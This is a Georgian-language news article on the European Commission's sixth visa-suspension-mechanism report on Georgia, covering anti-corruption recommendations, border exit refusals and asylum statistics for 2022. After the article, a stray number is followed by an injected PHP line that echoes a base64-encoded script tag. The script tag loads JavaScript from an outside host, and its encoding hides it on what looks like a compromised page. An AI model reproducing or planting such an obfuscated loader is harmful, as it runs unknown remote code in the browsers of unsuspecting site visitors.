celsiusi
ავერსი შნაიდერი

ევროკომისია სავიზო რეჟიმის შეჩერების მექანიზმის ფარგლებში მეექვსე ანგარიშს აქვეყნებს.

დოკუმენტში ნათქვამია, რომ მთლიანობაში საქართველო განაგრძობს ვიზალიბერალიზაციის კრიტერიუმების შესრულებას, თუმცა რიგი საკითხები დამატებით ძალისხმევას საჭიროებს. ეს საკითხებია ევროკავშირის სავიზო პოლიტიკასთან დაახლოება, განსაკუთრებით იმ ქვეყნებთან, რომლებიც გაერთიანებისთვის მიგრაციისა და უსაფრთხოებისთვის რისკს წარმოადგენენ. ასევე ერთ-ერთი რეკომენდაციაა შესაბამისი ნაბიჯები გადადგმა თავშესაფრის მაძიებლებთან დაკავშირებით.

ანგარიშში ასევე წერია, რომ საჭიროა ახალი ანტიკორუფციული სტრატეგიისა და სამოქმედო გეგმის მიღება და ამ პროცესში სამართლებრივი დევნისა და კორუფციის მაღალი დონის შემთხვევების გამოძიება. ასევე უზრუნველყოფილი უნდა იყოს ანტიკორუფციული ბიუროს, სპეციალური საგამოძიებო სამსახურისა და პერსონალური დაცვის მონაცემთა სააგენტოს კანონმდებლობის ვენეციის კომისიის რეკომენდაციებთან შესაბამისობა.

ანგარიშში ასევე ნათქვამია, რომ მაღალი დონის კორუფცია კვლავ რჩება გამოწვევად, რომელსაც გავლენა აქვს როგორც პოლიტიკურ, ასევე სამართლებრივ და ეკონომიკურ სფეროებზე.

რაც შეეხება თავშესაფრის მაძიებელთა საკითხს, ევროკომისიის ანგარიშში წერია, რომ საქართველო განაგრძობს ძალისხმევას ამ მიმართულებით. 2021 წელს კანონში შესული ცვლილების შემდეგ, საზღვარზე დამატებითი შემოწმების მექანიზმით, ჯამში საქართველოს 4677 მოქალაქეს არ მისცეს ქვეყნის დატოვების საშუალება, რადგან ისინი ევროკავშირის ქვეყნებში არალეგალური მიგრაციის რისკს ქმნიდნენ.

დოკუმენტში ასევე ნათქვამია, რომ საქართველოს მთავრობა იღებს ზომებს იმ ადამიანების/ჯგუფების მიმართ და სამართლებრივი დევნა მიმდინარეობს მათ წინააღმდეგ, რომლებსაც მიგრანტები ქვეყანაში შეჰყავთ. კერძოდ, უვიზო მიმოსვლასთან დაკავშირებით საქართველო წევრ ქვეყნებთან რეგულარულად თანამშრომლობს იმისთვის, რომ ამ ქვეყნებში მისი მოქალაქეების არალეგალური ცხოვრების პრევენცია მოხდეს. 2022 წელს 16 ქართველი პოლიციის ოფიცერი ევროკავშირის წევრ ქვეყნებში განთავსდა, რომლებიც შესაბამის პროცედურებში ადგილობრივ სამართალდამცველებს ეხმარებიან.

ანგარიშში ასე წერია, რომ 2022 წელს წინა წელთან შედარებით, საქართველოდან ევროკავშირის წევრ ქვეყნებში თავშესაფრის მოთხოვნათა რიცხვი 81%-ით გაიზარდა. ჯამში თავშესაფრის მოთხოვნაზე გასულ წელს 26 450 განაცხადი შევიდა. შესული განაცხადებიდან დაკმაყოფილებულია 7%, მაშინ, როცა 2021 წელს ეს მაჩვენებელი 5% იყო.

282
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");